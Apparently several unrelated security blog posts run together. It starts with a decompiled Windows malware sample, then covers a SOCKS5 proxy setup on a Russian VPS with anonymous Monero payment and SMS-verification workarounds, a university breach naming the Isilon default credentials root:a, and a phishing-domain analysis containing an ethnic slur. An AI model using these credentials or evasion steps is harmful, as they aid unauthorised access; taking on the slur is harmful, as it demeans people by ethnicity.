  local_8 = p_Var3;
  iVar4 = puts("Cjkh Kpgoft Mrl");
  if (iVar4 == 0) {
    local_10 = (char *)0x0;
    DAT_0040a074 = 0xffffffff;
  }
  DAT_0040a0f8 = DAT_0040a0f8 ^ 0xffff;
  pcVar16 = (char *)CONCAT31((int3)(unaff_EBX >> 8),DAT_0040a00e);
  strlen("Enoutwjs Mngef Ybwg");
  DAT_0040a060 = (char *)0x1d0;
  local_10 = (char *)((uint)local_10 & extraout_EDX_02);
  strlen("Jrkxwqmylr, Tetmf");
  pcVar17 = "Ixjyep. Ths, Tcfbe";
  strlen("Ixjyep. Ths, Tcfbe");
  local_54 = pcVar17;
  local_24 = FUN_00408ce9(pcVar17,extraout_DL);
  pcVar17 = local_10;
  DAT_0040a0fc = 0;
  if ((char)local_24 == 'P') {
    BVar5 = QueryPerformanceCounter((LARGE_INTEGER *)&DAT_0040a090);
    local_24 = (ushort)BVar5;
    _DAT_0040a100 = 0x2c3468;
    pcVar16 = (char *)~(uint)pcVar16;
    GetSystemTime((LPSYSTEMTIME)&DAT_0040a080);
  }
  local_3c = (uint)p_Var11;
  GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a014);
  local_b = 0;
  puts("Homaqmdy Rup Ox");
  iVar4 = puts("Crbw, Kcfsu, Qsqy");
  if ((iVar4 != 0) && (DAT_0040a05a = DAT_0040a05a & (ushort)pcVar16, (int)local_8 <= (int)p_Var11))
  {
    local_a = -1;
  }
  strlen("Sjrk. Yg. Wgkqfp");
  local_50 = 0;
  iVar4 = puts("Gdhthyy Ygcp Gobqc");
  if (local_a == (char)iVar4) {
    bVar15 = CARRY4((uint)p_Var11,(uint)pcVar17);
    p_Var11 = (LPSYSTEMTIME)((int)p_Var11 + (int)pcVar17);
    pcVar16 = extraout_EDX_03 + (uint)bVar15 + CONCAT31((int3)((uint)pcVar16 >> 8),local_c);
    local_58 = 0;
    if (pcVar17 == extraout_EDX_03) {
      _DAT_0040a0bc = 0x2d2be4;
    }
  }
  local_50 = 0x39614c;
  p_Var3 = &local_68;
  GetSystemTime(p_Var3);
  if (p_Var3 == (LPSYSTEMTIME)0x0) {
    DAT_0040a0c8 = (LPSYSTEMTIME)0x26c;
    local_54 = pcVar17;
    local_24 = (ushort)pcVar16;
  }
  _DAT_0040a104 = pcVar17;
  pcVar18 = "Brlptjuj. Lpiul";
  strlen("Brlptjuj. Lpiul");
  local_8 = (LPSYSTEMTIME)((int)local_8 - (int)pcVar18);
  FUN_00407736("Mpspyof. Q");
  GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a108);
  GetTickCount();
  if (local_b != (byte)pcVar16) {
    _DAT_0040a0fa = 0xe8;
    local_8 = (LPSYSTEMTIME)(((int)local_8 - extraout_EDX_04) - (uint)(local_b < (byte)pcVar16));
    DAT_0040a0e0 = extraout_EDX_04;
  }
  local_c = 0x2c;
  if ((char)((uint)pcVar16 >> 8) == ',') {
    puts("Qqrlmn. Rfyag, Gur");
  }
  local_8 = (LPSYSTEMTIME)((int)local_8 + 0x33714c);
  local_50 = local_50 - 0xc4faa0;
  _DAT_0040a14c = _DAT_0040a14c & (ushort)local_58;
  DAT_0040a074 = 0;
  strlen("Jnywjsxv Ycr Twdygo");
  QueryPerformanceCounter(&local_70);
  FUN_00407736(s_Peys,_Fk,_Xjffdr_0040a158);
  iVar4 = puts("Yyhlxc, Tqoa Tekwhr");
  if (iVar4 != DAT_0040a0a4) {
    puts("Yupo Rpi Pjvlt, Nxo");
    pcVar16 = DAT_0040a060;
  }
  local_50 = local_50 & 0x1517a4;
  GetTickCount();
  uVar10 = local_24;
  local_58 = local_58 - 0xdd5f30;
  DAT_0040a0fe = 1;
  uVar12 = CONCAT22((short)((uint)p_Var11 >> 0x10),local_24);
  cVar14 = '\x15';
  DAT_0040a0c8 = (LPSYSTEMTIME)pcVar16;
  uVar6 = puts("Etixxpcu Xua, Rcm");
  if ((uVar6 != 0) && ((_DAT_0040a16c & uVar6) != 0)) {
    _DAT_0040a14e = 0xe7f4;
    local_58 = (uint)pcVar17 >> 0x18 | ((uint)pcVar17 & 0xff0000) >> 8 |
               ((uint)pcVar17 & 0xff00) << 8 | (int)pcVar17 << 0x18;
  }
  strlen("Krcjo, Ldtvhs Tcb");
  puts("Jcjia Ewn, Qlhpq");
  if (DAT_0040a170 == extraout_EDX_05) {
    local_54 = pcVar16;
  }
  local_8 = (LPSYSTEMTIME)((int)local_8 + 0x96a3c0);
  bVar8 = 0x60;
  strlen("Xfhdu Nufd, Ajnx");
  p_Var11 = local_8;
  bVar15 = DAT_0040a0c6 < bVar8;
  if (DAT_0040a0c6 == bVar8) {
    bVar15 = 0xfffffe2f < local_58;
    local_58 = local_58 + 0x1d0;
    local_50 = (local_50 - 1) - (uint)bVar15;
    DAT_0040a0e4 = 0xbae0;
    local_24 = (ushort)cVar14;
    bVar15 = local_24 < (ushort)pcVar16;
    if (local_24 == (ushort)pcVar16) {
      bVar15 = false;
    }
  }
  DAT_0040a0ff = DAT_0040a0ff + -0x70 + bVar15;
  uVar6 = FUN_004078aa();
  if (p_Var11 == (LPSYSTEMTIME)uVar6) {
    strlen("Pjprvc Kbc. Pacgex");
  }
  puts("Wetujnfoun Epgj");
  sVar2 = strlen("Ckp, Tvbv Woqkrvgy");
  if (DAT_0040a074 == extraout_EDX_06) {
    local_58 = (local_58 - 0x3a2b10) - (uint)(DAT_0040a074 < extraout_EDX_06);
    local_24 = 1;
    if (sVar2 != 0x9c6cb36d) {
      local_a = -0x50;
    }
  }
  local_54 = (char *)((uint)local_54 | 0x3c8);
  _DAT_0040a0a8 = 0xa91030;
  GetACP();
  DAT_0040a174 = local_78;
  UVar7 = GetOEMCP();
  if ((DAT_0040a0c2 != extraout_CX_00) && ((UVar7 & 0xa3c0b358) == 0)) {
    p_Var11 = (LPSYSTEMTIME)(extraout_EDX_07 >> 8 & 0xff);
  }
  DAT_0040a178 = uVar12;
  iVar4 = puts("Rwvbvtfp. Sdcdt");
  if (iVar4 == 0) {
    local_78 = -local_78;
    _DAT_0040a17c = SUB42(p_Var11,0);
  }
  local_24 = (ushort)local_78;
  GetSystemTime(&local_38);
  FUN_00407736(s_Wxml._Gyak_0040a180);
  bVar8 = (byte)p_Var11;
  uVar9 = CONCAT11(local_a,bVar8);
  pcVar16 = extraout_EDX_08;
  if ((uVar9 != uVar10) &&
     (sVar2 = strlen("Hykkl Cah. Lhk. Kt"), pcVar16 = extraout_EDX_09, sVar2 == 0)) {
    DAT_0040a18c = DAT_0040a18c + -1;
    pcVar16 = local_10;
  }
  uVar12 = ~uVar12;
  local_10 = pcVar16;
  puts("Vdqejy Eeqgd Yleorx");
  local_a = '\x01';
  _DAT_0040a010 = local_78;
  local_8 = (LPSYSTEMTIME)CONCAT22((short)((uint)p_Var11 >> 0x10),uVar9);
  GetOEMCP();
  cVar14 = bVar8 + (char)DAT_0040a074 + (local_c < bVar8);
  QueryPerformanceCounter(&local_70);
  _DAT_0040a17e = 1;
  pcVar16 = "Lwilrw. Smxq, Mtg";
  puts("Lwilrw. Smxq, Mtg");
  bVar15 = DAT_0040a0e0 < local_78;
  if (DAT_0040a0e0 != local_78) {
    DAT_0040a0cc = extraout_EDX_10 & (uint)DAT_0040a060;
    cVar14 = (char)local_54;
    bVar15 = local_10 != (char *)0xffffffff;
    if (!bVar15) {
      DAT_0040a0cc = 0x68f130;
      cVar14 = '\0';
    }
    pcVar16 = (char *)~(uint)pcVar16;
  }
  local_10 = local_10 + (-(uint)bVar15 - (int)pcVar16);
  sVar2 = strlen("Kbwxyj Csqacui. Stp");
  uVar6 = uVar12;
  if (sVar2 == 0) {
    cVar14 = (char)local_58;
    uVar6 = uVar12 - local_58;
  }
  uVar10 = (ushort)uVar6;
  cVar14 = (cVar14 - (char)local_10) - (sVar2 == 0 && uVar12 < local_58);
  local_10 = (char *)0xdaea4;
  puts("Myvilee, Gvixwh A");
  GetTickCount();
  local_3c = 0xffffffff;
  pcVar16 = "Dyfd, Yannldh Toklr";
  strlen("Dyfd, Yannldh Toklr");
  FUN_00408800((uint)pcVar16);
  bVar8 = 0x34;
  iVar4 = puts("Nspexe Yueomh Lh");
  if (local_b == bVar8) {
    cVar14 = (char)iVar4;
  }
  if (SBORROW4(local_50,0x3b4)) {
    puts("Ydtiyt Rj, Jxkg Tmr");
  }
  DAT_0040a05a = DAT_0040a05a & 0x3430;
  GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a108);
  bVar8 = (byte)DAT_0040a190;
  DAT_0040a0c5 = cVar14;
  UVar7 = GetOEMCP();
  if (UVar7 != 0) {
    if ((UVar7 & 0x40) == 0) {
      uVar10 = (ushort)DAT_0040a194;
      local_9 = (undefined)(UVar7 >> 8);
    }
    bVar8 = bVar8 & (byte)local_3c;
  }
  puts("Tfqg Hafugk, Njltyh");
  pcVar16 = "Vbix Iowmwtocmr X";
  puts("Vbix Iowmwtocmr X");
  if (local_24 == uVar10) {
    pcVar16 = (char *)CONCAT22((short)((uint)pcVar16 >> 0x10),
                               CONCAT11(((char)((uint)pcVar16 >> 8) - bVar8) - (local_24 < uVar10),
                                        (char)pcVar16));
  }
  DAT_0040a078 = &DAT_00414570 + (uint)(local_24 != uVar10 && local_24 < uVar10) + (int)DAT_0040a078
  ;
  DAT_0040a0c4 = DAT_0040a0c4 + ' ';
  local_54 = pcVar16;
  GetACP();
  GetSystemTime((LPSYSTEMTIME)&DAT_0040a19c);
  DAT_0040a05a = DAT_0040a05a - 1;
  FUN_00408f23();
                    /* WARNING: Subroutine does not return */
  ExitProcess(0);
}

Conclusion

The malware naprava.exe gathers system information, drops a reverse shell in the WinLogon registry, and then sends info to C2 servers.

You are a threat hunter and need to perform some recon on an adversarial foreign APT. However, you do not want to use a common VPN service to get a foreign IP, since those are easily detected and blocked by foreign ISP router rules.

Solution? Personal Dante SOCKS5 proxy server set up on a VPS with a GeoIP located in your target nation.

Choose a VPS Service

First, you need to find a company that provides a VPS with an IP address geolocated in your target country. In this example, I’m going to choose Russia.

Use the following Google dork: site:”*.by” russia vps

This allows me to find companies in Belarus that offer Russian IP VPS. You can try searching for “*.ru” but with the sanctions, you will be unable to pay for the server with your American CC. But if you also need to stay anonymous, I would recommend using Monero (XMR) cryptocurrency. How do you get some? Coinbase > buy bitcoin > download Cake Wallet > transfer btc from Coinbase to Cake wallet address > Open Cake Wallet app and swap bitcoin for monero. Now you can find a native Russian VPS service that allows rentals with XMR.

However, I’ve noticed that all Russian VPS companies require working Russian contact info — namely, a phone number and/or email address. To do this, use OnlineSIM to get a SMS verification code for an email address sign up with Yandex/RuMail

Install & Configure Dante

I usually install dante on a barebones Debian VPS. Low footprint but still gives me the apt package manager natively.

$ sudo apt update
$ sudo apt install dante-server

Verify dante is installed:

$ systemctl status danted.service

Most likely it’s disabled. Make sure to enable the service.

$ sudo systemctl enable dated.service

Now let’s edit the config file. I usually keep it barebones:

logoutput: syslog
user.privileged: root
user.unprivileged: nobody

# The listening network interface or address.
internal: 0.0.0.0 port=1080

# The proxying network interface or address.
external: eth0

# socks-rules determine what is proxied through the external interface.
socksmethod: username

# client-rules determine who can connect to the internal interface.
clientmethod: none

client pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
}

socks pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
}

If you want to allow only your home computer to connect to the proxy, then specify your IP address in the client pass rule, from: option.

The socksmethod option determines the authentication method for when a client connects to the proxy. username refers to a username/password authentication method. Set clientmethod to none so you don’t have to authenticate again on the internal interface during the proxy connection setup process.

REMEMBER!!! Change the external: option to the interface of your VPS — it could be eth0 or ens3 or enp0s25, etc.

Now restart dante.

$ sudo systemctl restart danted.service

Connect to Proxy

Test the proxy using curl on your personal device.

$ curl -v -x socks5://your_dante_user:your_dante_password@your_server_ip:1080 http://www.google.com/

Output will tell you if you’ve successfully connected to the page.

I use the Dante proxy in Firefox Proxy Containers. Install the Container Proxy plugin and configure a proxy with the auth username/password and make sure it is using the SOCKS5 protocol (SOCKS5 can also be used in proxychains — maybe that’ll be a different post). Now assign that proxy to a container tab.

Open a new tab with that proxy and verify you can reach websites. I would also check the IP address on a public GeoIP checker.

The University’s IT team reported the breach this month. The final object of the hackers’ actions: student and faculty data found in Office 365 and an Isilion database of documents. However, no public statement yet as to who did it or really why. I feel like it could’ve been a disgruntled student aiming to get info on another student or even teacher. But let’s look at basic issues that probably plague most public universities.

Office 365 MFA

Since 2019, Microsoft has been rolling out Security Defaults for individual and enterprise 365 solutions. Security Defaults include pre-enabled MFA setting for all users in the new tenant when it is set up.

This is great news for anyone signing up for a random personal Office 365 subscription or for a brand new business starting out. However, it is safe to say that most universities have been around a lot longer than 5 years.

This means MFA was most likely not enabled by default for Western Sydney University students and faculty. Even though it is possible that their IT team could have implemented MFA, I don’t see this security measure (no matter how important) to be the number one priority for a school. The IT department is probably swamped with provisioning new devices for new students each year and replacing broken tech as the year goes on.

Thus, in this hack the most probably and simple breach of entry was a set of compromised credentials or weak passwords — since university email address patterns are public knowledge, making it easy to guess usernames.

Isilon Storage

Isilon may sound like a fancy cloud solution but it is nothing more than a NAS device. It operates in a storage cluster using FreeBSD. This means it provides access via the HTTP, SMB, NFS, and FTP protocols.

And as any good script kiddie will do (such as myself), one will search and find the default admin credentials for Isilon devices. Turns it out it is root:a. That’s it. root for the username and a for the password.

Now I’m really hoping the storage admins did not keep this default credential set. But, even if it was changed, Isilon provides LDAP/AD authentication. So, if the hacker already breached 365 with working credentials, he could have easily accessed the file storage, as well.

Solutions

The answers are always simple. And in this case, it is no different.

Enable MFA and change default credentials. Yes, it will be annoying and cumbersome to set it up for hundreds or thousands of students and faculty, but it will save you your job later on. School systems are great places for SSNs, financial account numbers, passports, immigration documents, and even PHI. Nobody wants to deal with that mess.

To enable security defaults:

1. Sign in to the Microsoft Entra admin center as at least a Conditional Access Administrator.
2. Browse to Identity > Overview > Properties.
3. Select Manage security defaults.
4. Set Security defaults to Enabled.
5. Select Save.

Lastly, change your NFS/SMB shares’ default credentials. Also, remember that if you do use LDAP/AD for authentication to the share, you may lose out on MFA tokens. I don’t know how Isilon, so that’s always a concern.

Scams coming from verified accounts on various platforms is not a new thing under the sun. But it’s another level when, on X, instead of compromising a blue checkmarked individual’s account, hackers OR disgusting pajeet scammers compromise a gold checkmarked account for high profile businesses and organizations. Imagine being contacted by such an account — which is exactly what happened recently to another X user.

I am unsure what the original account was, but compromising a gold check account and renaming it to X Helps is something I feel a lot of people will fall for.

The message to @DonutOperator contains a phishing link to hxxp://journey-x-annoying[.]com/case. Let’s start analysis and see if we can take this down.

Analysis

VirusTotal gives a 6/94 community score: https://www.virustotal.com/gui/domain/journey-x-annoying.com

WHOIS lookup in the VT Details tab shows that the domain was created and registered yesterday on 19 January via Tucows Domain Registration.

URLScan shows the URL leads to an X “Copyright Infrigement” so-called alert:

But as with 90% of all phishing attempts, the tell is in the details. Most scammers and hackers are foreign and can never get English grammar or spelling right. You’d think they’d be smart enough to just use an online spell check. Or even an AI generated paragraph. Also, they utilize the urgency tactic to rush a naive user into submitting a form right away:

Copyright infringement [is] detected in your account. If you think [the] copyright infringement is incorrect(?), you should provide feedback on the form. If you can’t give feedback, [y]our account will be permanently deleted from our servers within 24 hours!

URLScan shows no malicious redirects. VirusTotal shows that it is served by 104.21.52.83 and 172.67.197.67. These are both Cloudflare servers.

I threw the URL into Any.run sandbox app and found that clicking the Next button on the initial splash page doesn’t bring down any malicious code. Just an X login page: https://app.any.run/tasks/e8fc7414-1e99-4b19-8887-3fac567cb356

Lastly, I did run dirbuster from a Kali instance in order to find additional web server directories hiding on that domain — but I found nothing. All resulted in 404 http status codes. Granted, the domain has been alive for long and maybe can still be used for additional staging or malware hosting in the future.

Conclusion

Infiltration of the actor behind this scam will take an actual chat with the user and sending my own phishing link.

Overall it is a very effective phishing method. Compromise X accounts via social engineering and then use that account to phish others. Not sure of the scammer’s end game. Maybe to get to a “big fish” account in order to extort the account owner of money to get it back? I’m not sure. In this instance, the scammer just overlayed the phishing page with a real X login page to mimick it. But in reality the hacker is capturing credentials in a MITM attack.

Compromising gold checkmark accounts is a very easy way to get to someone. Always check for weird URL domains and for incorrect grammar/spelling.